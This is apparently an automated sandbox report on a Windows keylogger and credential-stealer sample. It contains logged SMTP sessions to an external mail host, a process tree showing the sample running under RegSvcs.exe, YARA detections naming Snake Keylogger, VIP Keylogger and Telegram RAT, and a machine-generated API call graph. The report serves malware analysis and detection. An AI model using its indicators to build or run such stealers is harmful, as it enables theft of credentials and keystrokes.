                                                                                                                      Jan 3, 2025 09:52:55.971074104 CET58750056208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:55.972918987 CET50056587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:56.119668961 CET58750056208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:52:57.230453968 CET58750057208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:22:57 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:52:57.230603933 CET50057587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:52:57.376312017 CET58750057208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:52:57.376480103 CET50057587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:52:57.522917032 CET58750057208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:53:01.035149097 CET58750058208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:23:00 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:53:01.101700068 CET50058587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:53:01.248416901 CET58750058208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:53:01.594805002 CET50058587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:53:01.747167110 CET58750058208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:53:03.984966993 CET58750059208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:23:03 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:53:03.987943888 CET50059587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:53:04.147802114 CET58750059208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:53:04.147960901 CET50059587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:53:04.298666954 CET58750059208.91.199.115192.168.2.5220 TLS go ahead
                                                                                                                      Jan 3, 2025 09:53:05.523578882 CET58750060208.91.199.115192.168.2.5220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 03 Jan 2025 14:23:05 +0530
                                                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                      220 and/or bulk e-mail.
                                                                                                                      Jan 3, 2025 09:53:05.523993969 CET50060587192.168.2.5208.91.199.115EHLO 642294
                                                                                                                      Jan 3, 2025 09:53:05.669959068 CET58750060208.91.199.115192.168.2.5250-bh-13.webhostbox.net Hello 642294 [8.46.123.189]
                                                                                                                      250-SIZE 52428800
                                                                                                                      250-8BITMIME
                                                                                                                      250-PIPELINING
                                                                                                                      250-PIPECONNECT
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-STARTTLS
                                                                                                                      250 HELP
                                                                                                                      Jan 3, 2025 09:53:05.670716047 CET50060587192.168.2.5208.91.199.115STARTTLS
                                                                                                                      Jan 3, 2025 09:53:05.817783117 CET58750060208.91.199.115192.168.2.5220 TLS go ahead

                                                                                                                      Click to jump to process

                                                                                                                      Click to jump to process

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Click to jump to process

                                                                                                                      Target ID:0
                                                                                                                      Start time:03:48:57
                                                                                                                      Start date:03/01/2025
                                                                                                                      Path:C:\Users\user\Desktop\W2k2NLSvja.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\W2k2NLSvja.exe"
                                                                                                                      Imagebase:0xf80000
                                                                                                                      File size:1'056'256 bytes
                                                                                                                      MD5 hash:3E473D16C81DD66FEE6F02537B601626
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.2036650956.0000000001580000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:2
                                                                                                                      Start time:03:48:58
                                                                                                                      Start date:03/01/2025
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\W2k2NLSvja.exe"
                                                                                                                      Imagebase:0xf70000
                                                                                                                      File size:45'984 bytes
                                                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4485162305.0000000003281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4484145905.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4485162305.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:4%
                                                                                                                        Dynamic/Decrypted Code Coverage:1.5%
                                                                                                                        Signature Coverage:6.1%
                                                                                                                        Total number of Nodes:2000
                                                                                                                        Total number of Limit Nodes:177
                                                                                                                        execution_graph 98169 f8107d 98174 f871eb 98169->98174 98171 f8108c 98205 fa2f80 98171->98205 98175 f871fb __write_nolock 98174->98175 98208 f877c7 98175->98208 98179 f872ba 98220 fa074f 98179->98220 98186 f877c7 59 API calls 98187 f872eb 98186->98187 98239 f87eec 98187->98239 98189 f872f4 RegOpenKeyExW 98190 fbecda RegQueryValueExW 98189->98190 98194 f87316 Mailbox 98189->98194 98191 fbed6c RegCloseKey 98190->98191 98192 fbecf7 98190->98192 98191->98194 98203 fbed7e _wcscat Mailbox __NMSG_WRITE 98191->98203 98243 fa0ff6 98192->98243 98194->98171 98195 fbed10 98253 f8538e 98195->98253 98198 fbed38 98256 f87d2c 98198->98256 98200 fbed52 98200->98191 98202 f83f84 59 API calls 98202->98203 98203->98194 98203->98202 98204 f87b52 59 API calls 98203->98204 98265 f87f41 98203->98265 98204->98203 98330 fa2e84 98205->98330 98207 f81096 98209 fa0ff6 Mailbox 59 API calls 98208->98209 98210 f877e8 98209->98210 98211 fa0ff6 Mailbox 59 API calls 98210->98211 98212 f872b1 98211->98212 98213 f84864 98212->98213 98269 fb1b90 98213->98269 98216 f87f41 59 API calls 98217 f84897 98216->98217 98271 f848ae 98217->98271 98219 f848a1 Mailbox 98219->98179 98221 fb1b90 __write_nolock 98220->98221 98222 fa075c GetFullPathNameW 98221->98222 98223 fa077e 98222->98223 98224 f87d2c 59 API calls 98223->98224 98225 f872c5 98224->98225 98226 f87e0b 98225->98226 98227 f87e1f 98226->98227 98228 fbf173 98226->98228 98293 f87db0 98227->98293 98298 f88189 98228->98298 98231 f872d3 98233 f83f84 98231->98233 98232 fbf17e __NMSG_WRITE _memmove 98234 f83fb4 _memmove 98233->98234 98235 f83f92 98233->98235 98236 fa0ff6 Mailbox 59 API calls 98234->98236 98238 fa0ff6 Mailbox 59 API calls 98235->98238 98237 f83fc8 98236->98237 98237->98186 98238->98234 98240 f87f06 98239->98240 98242 f87ef9 98239->98242 98241 fa0ff6 Mailbox 59 API calls 98240->98241 98241->98242 98242->98189 98246 fa0ffe 98243->98246 98245 fa1018 98245->98195 98246->98245 98248 fa101c std::exception::exception 98246->98248 98301 fa594c 98246->98301 98318 fa35e1 DecodePointer 98246->98318 98319 fa87db RaiseException 98248->98319 98250 fa1046 98320 fa8711 58 API calls _free 98250->98320 98252 fa1058 98252->98195 98254 fa0ff6 Mailbox 59 API calls 98253->98254 98255 f853a0 RegQueryValueExW 98254->98255 98255->98198 98255->98200 98257 f87d38 __NMSG_WRITE 98256->98257 98258 f87da5 98256->98258 98261 f87d4e 98257->98261 98262 f87d73 98257->98262 98259 f87e8c 59 API calls 98258->98259 98260 f87d56 _memmove 98259->98260 98260->98200 98329 f88087 59 API calls Mailbox 98261->98329 98263 f88189 59 API calls 98262->98263 98263->98260 98266 f87f50 __NMSG_WRITE _memmove 98265->98266 98267 fa0ff6 Mailbox 59 API calls 98266->98267 98268 f87f8e 98267->98268 98268->98203 98270 f84871 GetModuleFileNameW 98269->98270 98270->98216 98272 fb1b90 __write_nolock 98271->98272 98273 f848bb GetFullPathNameW 98272->98273 98274 f848da 98273->98274 98275 f848f7 98273->98275 98276 f87d2c 59 API calls 98274->98276 98277 f87eec 59 API calls 98275->98277 98278 f848e6 98276->98278 98277->98278 98281 f87886 98278->98281 98282 f87894 98281->98282 98285 f87e8c 98282->98285 98284 f848f2 98284->98219 98286 f87e9a 98285->98286 98288 f87ea3 _memmove 98285->98288 98286->98288 98289 f87faf 98286->98289 98288->98284 98290 f87fc2 98289->98290 98292 f87fbf _memmove 98289->98292 98291 fa0ff6 Mailbox 59 API calls 98290->98291 98291->98292 98292->98288 98294 f87dbf __NMSG_WRITE 98293->98294 98295 f87dd0 _memmove 98294->98295 98296 f88189 59 API calls 98294->98296 98295->98231 98297 fbf130 _memmove 98296->98297 98299 fa0ff6 Mailbox 59 API calls 98298->98299 98300 f88193 98299->98300 98300->98232 98302 fa59c7 98301->98302 98310 fa5958 98301->98310 98327 fa35e1 DecodePointer 98302->98327 98304 fa59cd 98328 fa8d68 58 API calls __getptd_noexit 98304->98328 98307 fa598b RtlAllocateHeap 98307->98310 98317 fa59bf 98307->98317 98309 fa59b3 98325 fa8d68 58 API calls __getptd_noexit 98309->98325 98310->98307 98310->98309 98311 fa5963 98310->98311 98315 fa59b1 98310->98315 98324 fa35e1 DecodePointer 98310->98324 98311->98310 98321 faa3ab 58 API calls __NMSG_WRITE 98311->98321 98322 faa408 58 API calls 5 library calls 98311->98322 98323 fa32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98311->98323 98326 fa8d68 58 API calls __getptd_noexit 98315->98326 98317->98246 98318->98246 98319->98250 98320->98252 98321->98311 98322->98311 98324->98310 98325->98315 98326->98317 98327->98304 98328->98317 98329->98260 98331 fa2e90 __write 98330->98331 98338 fa3457 98331->98338 98337 fa2eb7 __write 98337->98207 98355 fa9e4b 98338->98355 98340 fa2e99 98341 fa2ec8 DecodePointer DecodePointer 98340->98341 98342 fa2ea5 98341->98342 98343 fa2ef5 98341->98343 98352 fa2ec2 98342->98352 98343->98342 98401 fa89e4 59 API calls __write 98343->98401 98345 fa2f58 EncodePointer EncodePointer 98345->98342 98346 fa2f2c 98346->98342 98350 fa2f46 EncodePointer 98346->98350 98403 fa8aa4 61 API calls 2 library calls 98346->98403 98347 fa2f07 98347->98345 98347->98346 98402 fa8aa4 61 API calls 2 library calls 98347->98402 98350->98345 98351 fa2f40 98351->98342 98351->98350 98404 fa3460 98352->98404 98356 fa9e6f EnterCriticalSection 98355->98356 98357 fa9e5c 98355->98357 98356->98340 98362 fa9ed3 98357->98362 98359 fa9e62 98359->98356 98386 fa32f5 58 API calls 3 library calls 98359->98386 98363 fa9edf __write 98362->98363 98364 fa9ee8 98363->98364 98365 fa9f00 98363->98365 98387 faa3ab 58 API calls __NMSG_WRITE 98364->98387 98373 fa9f21 __write 98365->98373 98390 fa8a5d 58 API calls 2 library calls 98365->98390 98368 fa9eed 98388 faa408 58 API calls 5 library calls 98368->98388 98369 fa9f15 98371 fa9f2b 98369->98371 98372 fa9f1c 98369->98372 98377 fa9e4b __lock 58 API calls 98371->98377 98391 fa8d68 58 API calls __getptd_noexit 98372->98391 98373->98359 98374 fa9ef4 98389 fa32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98374->98389 98379 fa9f32 98377->98379 98380 fa9f3f 98379->98380 98381 fa9f57 98379->98381 98392 faa06b InitializeCriticalSectionAndSpinCount 98380->98392 98393 fa2f95 98381->98393 98384 fa9f4b 98399 fa9f73 LeaveCriticalSection _doexit 98384->98399 98387->98368 98388->98374 98390->98369 98391->98373 98392->98384 98394 fa2fc7 _free 98393->98394 98395 fa2f9e RtlFreeHeap 98393->98395 98394->98384 98395->98394 98396 fa2fb3 98395->98396 98400 fa8d68 58 API calls __getptd_noexit 98396->98400 98398 fa2fb9 GetLastError 98398->98394 98399->98373 98400->98398 98401->98347 98402->98346 98403->98351 98407 fa9fb5 LeaveCriticalSection 98404->98407 98406 fa2ec7 98406->98337 98407->98406 98408 f523b0 98422 f50000 98408->98422 98410 f524b4 98425 f522a0 98410->98425 98428 f534e0 GetPEB 98422->98428 98424 f5068b 98424->98410 98426 f522a9 Sleep 98425->98426 98427 f522b7 98426->98427 98429 f5350a 98428->98429 98429->98424 98430 fa7e93 98431 fa7e9f __write 98430->98431 98467 faa048 GetStartupInfoW 98431->98467 98434 fa7ea4 98469 fa8dbc GetProcessHeap 98434->98469 98435 fa7efc 98439 fa7f07 98435->98439 98552 fa7fe3 58 API calls 3 library calls 98435->98552 98438 fa7f0d 98440 fa7f18 __RTC_Initialize 98438->98440 98553 fa7fe3 58 API calls 3 library calls 98438->98553 98470 fa9d26 98439->98470 98491 fad812 98440->98491 98443 fa7f27 98444 fa7f33 GetCommandLineW 98443->98444 98554 fa7fe3 58 API calls 3 library calls 98443->98554 98510 fb5173 GetEnvironmentStringsW 98444->98510 98447 fa7f32 98447->98444 98450 fa7f4d 98451 fa7f58 98450->98451 98555 fa32f5 58 API calls 3 library calls 98450->98555 98520 fb4fa8 98451->98520 98454 fa7f5e 98455 fa7f69 98454->98455 98556 fa32f5 58 API calls 3 library calls 98454->98556 98534 fa332f 98455->98534 98458 fa7f71 98459 fa7f7c __wwincmdln 98458->98459 98557 fa32f5 58 API calls 3 library calls 98458->98557 98540 f8492e 98459->98540 98462 fa7f90 98463 fa7f9f 98462->98463 98558 fa3598 58 API calls _doexit 98462->98558 98559 fa3320 58 API calls _doexit 98463->98559 98466 fa7fa4 __write 98468 faa05e 98467->98468 98468->98434 98469->98435 98560 fa33c7 36 API calls 2 library calls 98470->98560 98472 fa9d2b 98561 fa9f7c InitializeCriticalSectionAndSpinCount __ioinit 98472->98561 98474 fa9d30 98475 fa9d34 98474->98475 98563 fa9fca TlsAlloc 98474->98563 98562 fa9d9c 61 API calls 2 library calls 98475->98562 98478 fa9d39 98478->98438 98479 fa9d46 98479->98475 98480 fa9d51 98479->98480 98564 fa8a15 98480->98564 98483 fa9d93 98572 fa9d9c 61 API calls 2 library calls 98483->98572 98486 fa9d98 98486->98438 98487 fa9d72 98487->98483 98488 fa9d78 98487->98488 98571 fa9c73 58 API calls 4 library calls 98488->98571 98490 fa9d80 GetCurrentThreadId 98490->98438 98492 fad81e __write 98491->98492 98493 fa9e4b __lock 58 API calls 98492->98493 98494 fad825 98493->98494 98495 fa8a15 __calloc_crt 58 API calls 98494->98495 98496 fad836 98495->98496 98497 fad841 __write @_EH4_CallFilterFunc@8 98496->98497 98498 fad8a1 GetStartupInfoW 98496->98498 98497->98443 98503 fad8b6 98498->98503 98505 fad9e5 98498->98505 98499 fadaad 98586 fadabd LeaveCriticalSection _doexit 98499->98586 98501 fa8a15 __calloc_crt 58 API calls 98501->98503 98502 fada32 GetStdHandle 98502->98505 98503->98501 98503->98505 98507 fad904 98503->98507 98504 fada45 GetFileType 98504->98505 98505->98499 98505->98502 98505->98504 98585 faa06b InitializeCriticalSectionAndSpinCount 98505->98585 98506 fad938 GetFileType 98506->98507 98507->98505 98507->98506 98584 faa06b InitializeCriticalSectionAndSpinCount 98507->98584 98511 fa7f43 98510->98511 98513 fb5184 98510->98513 98516 fb4d6b GetModuleFileNameW 98511->98516 98587 fa8a5d 58 API calls 2 library calls 98513->98587 98514 fb51aa _memmove 98515 fb51c0 FreeEnvironmentStringsW 98514->98515 98515->98511 98517 fb4d9f _wparse_cmdline 98516->98517 98519 fb4ddf _wparse_cmdline 98517->98519 98588 fa8a5d 58 API calls 2 library calls 98517->98588 98519->98450 98521 fb4fc1 __NMSG_WRITE 98520->98521 98525 fb4fb9 98520->98525 98522 fa8a15 __calloc_crt 58 API calls 98521->98522 98530 fb4fea __NMSG_WRITE 98522->98530 98523 fb5041 98524 fa2f95 _free 58 API calls 98523->98524 98524->98525 98525->98454 98526 fa8a15 __calloc_crt 58 API calls 98526->98530 98527 fb5066 98528 fa2f95 _free 58 API calls 98527->98528 98528->98525 98530->98523 98530->98525 98530->98526 98530->98527 98531 fb507d 98530->98531 98589 fb4857 58 API calls __write 98530->98589 98590 fa9006 IsProcessorFeaturePresent 98531->98590 98533 fb5089 98533->98454 98536 fa333b __IsNonwritableInCurrentImage 98534->98536 98613 faa711 98536->98613 98537 fa3359 __initterm_e 98538 fa2f80 __cinit 67 API calls 98537->98538 98539 fa3378 __cinit __IsNonwritableInCurrentImage 98537->98539 98538->98539 98539->98458 98541 f84948 98540->98541 98551 f849e7 98540->98551 98542 f84982 IsThemeActive 98541->98542 98616 fa35ac 98542->98616 98546 f849ae 98628 f84a5b SystemParametersInfoW SystemParametersInfoW 98546->98628 98548 f849ba 98629 f83b4c 98548->98629 98550 f849c2 SystemParametersInfoW 98550->98551 98551->98462 98552->98439 98553->98440 98554->98447 98558->98463 98559->98466 98560->98472 98561->98474 98562->98478 98563->98479 98566 fa8a1c 98564->98566 98567 fa8a57 98566->98567 98569 fa8a3a 98566->98569 98573 fb5446 98566->98573 98567->98483 98570 faa026 TlsSetValue 98567->98570 98569->98566 98569->98567 98581 faa372 Sleep 98569->98581 98570->98487 98571->98490 98572->98486 98574 fb5451 98573->98574 98577 fb546c 98573->98577 98575 fb545d 98574->98575 98574->98577 98582 fa8d68 58 API calls __getptd_noexit 98575->98582 98576 fb547c RtlAllocateHeap 98576->98577 98579 fb5462 98576->98579 98577->98576 98577->98579 98583 fa35e1 DecodePointer 98577->98583 98579->98566 98581->98569 98582->98579 98583->98577 98584->98507 98585->98505 98586->98497 98587->98514 98588->98519 98589->98530 98591 fa9011 98590->98591 98596 fa8e99 98591->98596 98595 fa902c 98595->98533 98597 fa8eb3 _memset ___raise_securityfailure 98596->98597 98598 fa8ed3 IsDebuggerPresent 98597->98598 98604 faa395 SetUnhandledExceptionFilter UnhandledExceptionFilter 98598->98604 98601 fa8f97 ___raise_securityfailure 98605 fac836 98601->98605 98602 fa8fba 98603 faa380 GetCurrentProcess TerminateProcess 98602->98603 98603->98595 98604->98601 98606 fac83e 98605->98606 98607 fac840 IsProcessorFeaturePresent 98605->98607 98606->98602 98609 fb5b5a 98607->98609 98612 fb5b09 5 API calls 2 library calls 98609->98612 98611 fb5c3d 98611->98602 98612->98611 98614 faa714 EncodePointer 98613->98614 98614->98614 98615 faa72e 98614->98615 98615->98537 98617 fa9e4b __lock 58 API calls 98616->98617 98618 fa35b7 DecodePointer EncodePointer 98617->98618 98681 fa9fb5 LeaveCriticalSection 98618->98681 98620 f849a7 98621 fa3614 98620->98621 98622 fa3638 98621->98622 98623 fa361e 98621->98623 98622->98546 98623->98622 98682 fa8d68 58 API calls __getptd_noexit 98623->98682 98625 fa3628 98683 fa8ff6 9 API calls __write 98625->98683 98627 fa3633 98627->98546 98628->98548 98630 f83b59 __write_nolock 98629->98630 98631 f877c7 59 API calls 98630->98631 98632 f83b63 GetCurrentDirectoryW 98631->98632 98684 f83778 98632->98684 98634 f83b8c IsDebuggerPresent 98635 f83b9a 98634->98635 98636 fbd4ad MessageBoxA 98634->98636 98638 fbd4c7 98635->98638 98639 f83bb7 98635->98639 98667 f83c73 98635->98667 98636->98638 98637 f83c7a SetCurrentDirectoryW 98640 f83c87 Mailbox 98637->98640 98884 f87373 59 API calls Mailbox 98638->98884 98765 f873e5 98639->98765 98640->98550 98643 fbd4d7 98648 fbd4ed SetCurrentDirectoryW 98643->98648 98645 f83bd5 GetFullPathNameW 98646 f87d2c 59 API calls 98645->98646 98647 f83c10 98646->98647 98781 f90a8d 98647->98781 98648->98640 98651 f83c2e 98652 f83c38 98651->98652 98885 fe4c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 98651->98885 98797 f83a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98652->98797 98655 fbd50a 98655->98652 98658 fbd51b 98655->98658 98660 f84864 61 API calls 98658->98660 98667->98637 98681->98620 98682->98625 98683->98627 98685 f877c7 59 API calls 98684->98685 98686 f8378e 98685->98686 98895 f83d43 98686->98895 98688 f837ac 98689 f84864 61 API calls 98688->98689 98690 f837c0 98689->98690 98691 f87f41 59 API calls 98690->98691 98692 f837cd 98691->98692 98909 f84f3d 98692->98909 98695 fbd3ae 98980 fe97e5 98695->98980 98696 f837ee Mailbox 98933 f881a7 98696->98933 98700 fbd3cd 98702 fa2f95 _free 58 API calls 98700->98702 98704 fbd3da 98702->98704 98706 f84faa 84 API calls 98704->98706 98708 fbd3e3 98706->98708 98712 f83ee2 59 API calls 98708->98712 98709 f87f41 59 API calls 98710 f8381a 98709->98710 98940 f88620 98710->98940 98714 fbd3fe 98712->98714 98713 f8382c Mailbox 98715 f87f41 59 API calls 98713->98715 98716 f83ee2 59 API calls 98714->98716 98717 f83852 98715->98717 98719 fbd41a 98716->98719 98718 f88620 69 API calls 98717->98718 98722 f83861 Mailbox 98718->98722 98720 f84864 61 API calls 98719->98720 98721 fbd43f 98720->98721 98723 f83ee2 59 API calls 98721->98723 98725 f877c7 59 API calls 98722->98725 98724 fbd44b 98723->98724 98726 f881a7 59 API calls 98724->98726 98727 f8387f 98725->98727 98728 fbd459 98726->98728 98944 f83ee2 98727->98944 98730 f83ee2 59 API calls 98728->98730 98732 fbd468 98730->98732 98738 f881a7 59 API calls 98732->98738 98734 f83899 98734->98708 98735 f838a3 98734->98735 98736 fa313d _W_store_winword 60 API calls 98735->98736 98737 f838ae 98736->98737 98737->98714 98739 f838b8 98737->98739 98741 fbd48a 98738->98741 98740 fa313d _W_store_winword 60 API calls 98739->98740 98743 f838c3 98740->98743 98742 f83ee2 59 API calls 98741->98742 98744 fbd497 98742->98744 98743->98719 98745 f838cd 98743->98745 98744->98744 98746 fa313d _W_store_winword 60 API calls 98745->98746 98747 f838d8 98746->98747 98747->98732 98748 f83919 98747->98748 98750 f83ee2 59 API calls 98747->98750 98748->98732 98749 f83926 98748->98749 98960 f8942e 98749->98960 98751 f838fc 98750->98751 98754 f881a7 59 API calls 98751->98754 98756 f8390a 98754->98756 98758 f83ee2 59 API calls 98756->98758 98758->98748 98760 f893ea 59 API calls 98762 f83961 98760->98762 98761 f89040 60 API calls 98761->98762 98762->98760 98762->98761 98763 f83ee2 59 API calls 98762->98763 98764 f839a7 Mailbox 98762->98764 98763->98762 98764->98634 98766 f873f2 __write_nolock 98765->98766 98767 fbee4b _memset 98766->98767 98768 f8740b 98766->98768 98771 fbee67 GetOpenFileNameW 98767->98771 98769 f848ae 60 API calls 98768->98769 98770 f87414 98769->98770 99840 fa09d5 98770->99840 98773 fbeeb6 98771->98773 98774 f87d2c 59 API calls 98773->98774 98776 fbeecb 98774->98776 98776->98776 98778 f87429 99858 f869ca 98778->99858 98782 f90a9a __write_nolock 98781->98782 100169 f86ee0 98782->100169 98784 f90a9f 98785 f83c26 98784->98785 100180 f912fe 89 API calls 98784->100180 98785->98643 98785->98651 98787 f90aac 98787->98785 100181 f94047 91 API calls Mailbox 98787->100181 98789 f90ab5 98789->98785 98790 f90ab9 GetFullPathNameW 98789->98790 98791 f87d2c 59 API calls 98790->98791 98798 fbd49c 98797->98798 98799 f83ac2 LoadImageW RegisterClassExW 98797->98799 100219 f83041 7 API calls 98799->100219 98884->98643 98885->98655 98896 f83d50 __write_nolock 98895->98896 98897 f87d2c 59 API calls 98896->98897 98902 f83eb6 Mailbox 98896->98902 98899 f83d82 98897->98899 98908 f83db8 Mailbox 98899->98908 99021 f87b52 98899->99021 98900 f87b52 59 API calls 98900->98908 98901 f83e89 98901->98902 98903 f87f41 59 API calls 98901->98903 98902->98688 98905 f83eaa 98903->98905 98904 f87f41 59 API calls 98904->98908 98906 f83f84 59 API calls 98905->98906 98906->98902 98907 f83f84 59 API calls 98907->98908 98908->98900 98908->98901 98908->98902 98908->98904 98908->98907 99024 f84d13 98909->99024 98914 f84f68 LoadLibraryExW 99034 f84cc8 98914->99034 98915 fbdd0f 98917 f84faa 84 API calls 98915->98917 98918 fbdd16 98917->98918 98920 f84cc8 3 API calls 98918->98920 98922 fbdd1e 98920->98922 99060 f8506b 98922->99060 98923 f84f8f 98923->98922 98924 f84f9b 98923->98924 98926 f84faa 84 API calls 98924->98926 98928 f837e6 98926->98928 98928->98695 98928->98696 98930 fbdd45 99068 f85027 98930->99068 98932 fbdd52 98934 f83801 98933->98934 98935 f881b2 98933->98935 98937 f893ea 98934->98937 99495 f880d7 98935->99495 98938 fa0ff6 Mailbox 59 API calls 98937->98938 98939 f8380d 98938->98939 98939->98709 98941 f8862b 98940->98941 98943 f88652 98941->98943 99499 f88b13 69 API calls Mailbox 98941->99499 98943->98713 98945 f83eec 98944->98945 98946 f83f05 98944->98946 98947 f881a7 59 API calls 98945->98947 98948 f87d2c 59 API calls 98946->98948 98949 f8388b 98947->98949 98948->98949 98950 fa313d 98949->98950 98951 fa3149 98950->98951 98952 fa31be 98950->98952 98959 fa316e 98951->98959 99500 fa8d68 58 API calls __getptd_noexit 98951->99500 99502 fa31d0 60 API calls 3 library calls 98952->99502 98955 fa31cb 98955->98734 98956 fa3155 99501 fa8ff6 9 API calls __write 98956->99501 98958 fa3160 98958->98734 98959->98734 98961 f89436 98960->98961 98962 fa0ff6 Mailbox 59 API calls 98961->98962 98963 f89444 98962->98963 98964 f83936 98963->98964 99503 f8935c 59 API calls Mailbox 98963->99503 98966 f891b0 98964->98966 99504 f892c0 98966->99504 98968 f891bf 98969 fa0ff6 Mailbox 59 API calls 98968->98969 98970 f83944 98968->98970 98969->98970 98971 f89040 98970->98971 98972 fbf5a5 98971->98972 98974 f89057 